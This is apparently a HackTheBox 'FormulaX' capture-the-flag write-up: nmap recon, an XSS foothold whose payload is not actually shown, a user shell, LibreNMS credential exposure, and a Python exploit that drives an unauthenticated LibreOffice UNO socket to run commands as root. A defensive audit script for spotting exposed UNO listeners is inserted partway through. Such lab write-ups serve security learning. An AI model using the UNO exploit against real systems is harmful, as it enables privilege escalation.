FormulaX is a hard-difficulty machine from HackTheBox. We start with an XSS foothold that lets us reach a hidden subdomain vulnerable to CVE-2022-24439. Later we obtain hidden credentials from a mongo database to acquire the user flag. Finally we take advantage of credentials exposed through librenms and use a public exploit for LibreOffice to obtain the root flag.
```
PS C:\Users\0xkujen> nmap -A -Pn 10.129.230.190
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-16 20:39 W. Central Africa Standard Time
NSOCK ERROR [0.2640s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for 10.129.230.190
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 5fb2cd54e447d10e9e8135923cd6a3cb (ECDSA)
|_  256 b9f00ddc057bfafb91e6d0b459e6db88 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /static/index.html
|_http-cors: GET POST
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=8/16%OT=22%CT=1%CU=33472%PV=Y%DS=2%DC=T%G=Y%TM=66BFAB7
OS:9%P=i686-pc-windows-windows)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I)SEQ(
OS:CI=Z%II=I)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=B)OPS(O1=M54EST11NW
OS:7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST
OS:11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40
OS:%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%U
OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   477.00 ms 10.10.16.1
2   477.00 ms 10.129.230.190

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.08 seconds
```
We can see OpenSSH running on port 22 and a web application exposed on port 80.
But it seems we're getting an error about an unsupported method. This made me think my code was not suited to this particular XSS. Digging a bit deeper, I discovered a chat.js file that helped a lot in understanding how communication works in this web app.
This script let me understand the back-end communication in depth, that is, how the chatbot interprets messages, and allowed me to craft this payload:
```
PS C:\Users\0xkujen> ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-97-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Aug 16 17:33:09 2024 from 10.10.x.x
frank_dorky@formulax:~$ id
uid=1002(frank_dorky) gid=1002(frank_dorky) groups=1002(frank_dorky)
frank_dorky@formulax:~$ ls
user.txt
frank_dorky@formulax:~$ cat user.txt
08c82572ce4de9******************
frank_dorky@formulax:~$
```
Pivoting from frank_dorky to kai_relay
Checking the /opt folder, I found an unusual directory, librenms:
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems including Cisco, Linux, FreeBSD, Juniper, Brocade, Foundry, HP and many more.
Checking the public GitHub repo for LibreNMS, I found an interesting script, config_to_json.php, which extracts the LibreNMS configuration data in a structured format such as JSON, presumably for integration, automation or debugging purposes.
Running that file, we get interesting output containing credentials for kai_relay:
This script launches LibreOffice Calc in headless mode and sets it up to listen for UNO connections on localhost:2002. This allows other programs or scripts to control LibreOffice remotely, typically to automate tasks such as document processing or conversion; the UNO bridge itself performs no authentication, so whoever can reach that socket drives the office process with its privileges.
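As an added defender-side example (not part of the original writeup or the box), a small Python audit that flags headless LibreOffice processes exposing a UNO accept socket, parsed from `ps -eo user,args` output. The sample process lines, users, hosts and ports below are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample of `ps -eo user,args` output (not taken from the box).
SAMPLE_PS = """\
USER     COMMAND
root     /usr/lib/libreoffice/program/soffice.bin --headless --calc --accept=socket,host=localhost,port=2002;urp;
kai      /usr/lib/libreoffice/program/soffice.bin --headless --accept=socket,host=0.0.0.0,port=8100;urp;StarOffice.ServiceManager
frank    /usr/lib/libreoffice/program/soffice.bin --headless --convert-to pdf report.odt
"""

LOOPBACK = {"localhost", "127.0.0.1", "::1"}
# Matches --accept=socket,host=H,port=P;urp;... (quotes are optional in ps output)
ACCEPT_RE = re.compile(r'--accept="?socket,([^;"\s]*)')

@dataclass
class UnoListener:
    user: str
    host: str
    port: int

    def risk(self) -> str:
        # The UNO bridge has no authentication: anyone who can reach the socket
        # gets SystemShellExecute running as the soffice user.
        if self.host not in LOOPBACK:
            return "high: UNO socket reachable from the network as %s" % self.user
        if self.user == "root":
            return "high: local users can run commands as root via UNO"
        return "medium: local users can run commands as %s via UNO" % self.user

def find_uno_listeners(ps_output: str) -> list:
    findings = []
    for line in ps_output.splitlines()[1:]:      # skip the header row
        user, _, cmd = line.partition(" ")
        cmd = cmd.lstrip()
        if "soffice" not in cmd:
            continue
        m = ACCEPT_RE.search(cmd)
        if not m:
            continue                             # headless but not listening
        params = dict(kv.split("=", 1) for kv in m.group(1).split(",") if "=" in kv)
        findings.append(UnoListener(user, params.get("host", "?"), int(params.get("port", 0))))
    return findings

if __name__ == "__main__":
    for f in find_uno_listeners(SAMPLE_PS):
        print(f"{f.user}: {f.host}:{f.port} -> {f.risk()}")
```

Feed it real `ps -eo user,args` output to spot an office.sh-style listener before an unprivileged user does.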
Checking for public exploits for this binary, we find an interesting one: Soffice-Exploit
```python
import uno
from com.sun.star.system import XSystemShellExecute
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)

args = parser.parse_args()

# Define the UNO component
localContext = uno.getComponentContext()

# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
    "com.sun.star.bridge.UnoUrlResolver", localContext
)

# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
    "uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host, args.port))

# Ask the service manager for the SystemShellExecute service and use it
# to run cat on /root/root.txt with the privileges of the soffice process
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("/usr/bin/cat", "/root/root.txt", 1)
```
The first step is to run the /usr/bin/office.sh bash script in a separate SSH session, then run our exploit. We run it and get our root flag: